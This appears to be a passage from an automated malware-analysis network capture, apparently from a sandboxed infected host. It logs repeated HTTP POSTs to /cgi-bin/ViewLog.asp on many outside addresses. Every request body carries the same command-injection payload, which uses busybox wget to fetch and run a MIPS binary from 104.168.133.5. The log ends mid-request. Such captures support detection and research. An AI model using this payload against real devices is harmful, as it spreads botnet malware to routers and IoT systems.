                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              58192.168.2.145605294.120.211.1998080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:14.876734972 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              59192.168.2.144249894.120.13.768080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:14.973984003 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              60192.168.2.145242494.120.105.2548080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:15.662075043 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              61192.168.2.144411431.200.49.1038080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:15.662154913 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              62192.168.2.144282494.121.78.488080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:15.662213087 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              63192.168.2.144642631.47.148.678080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:15.674403906 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:15.922302961 CET465INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 07:15:14 GMT
                                              Server: Webs
                                              X-Frame-Options: SAMEORIGIN
                                              Cache-Control: no-cache
                                              Content-Length: 166
                                              Content-Type: text/html
                                              Connection: keep-alive
                                              Keep-Alive: timeout=60, max=99
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              64192.168.2.145995495.183.9.1248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:15.794239044 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:16.170362949 CET662INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:15:16 GMT
                                              Server: Apache/2.2.15 (CentOS)
                                              Content-Length: 416
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.2.15 (CentOS) Server at 192.168.0.14 Port 80</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              65192.168.2.145982694.120.212.2268080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:16.105094910 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              66192.168.2.144416062.29.72.1328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:16.108803988 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              67192.168.2.143428494.120.96.98080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:16.109256029 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              68192.168.2.1439634120.53.4.9623
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:18.558199883 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 35 3a 30 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:15:01Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              69192.168.2.144320831.136.51.2238080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:18.562017918 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:21.608346939 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:27.752126932 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:39.783534050 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:05.382472992 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:54.532434940 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              70192.168.2.143372695.163.73.58080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:18.594185114 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              71192.168.2.143988094.122.218.2428080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:18.599699974 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              72192.168.2.144436895.9.221.58080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:18.620624065 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              73192.168.2.144758831.134.38.1108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:18.681063890 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              74192.168.2.145597262.29.116.2048080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:18.834328890 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
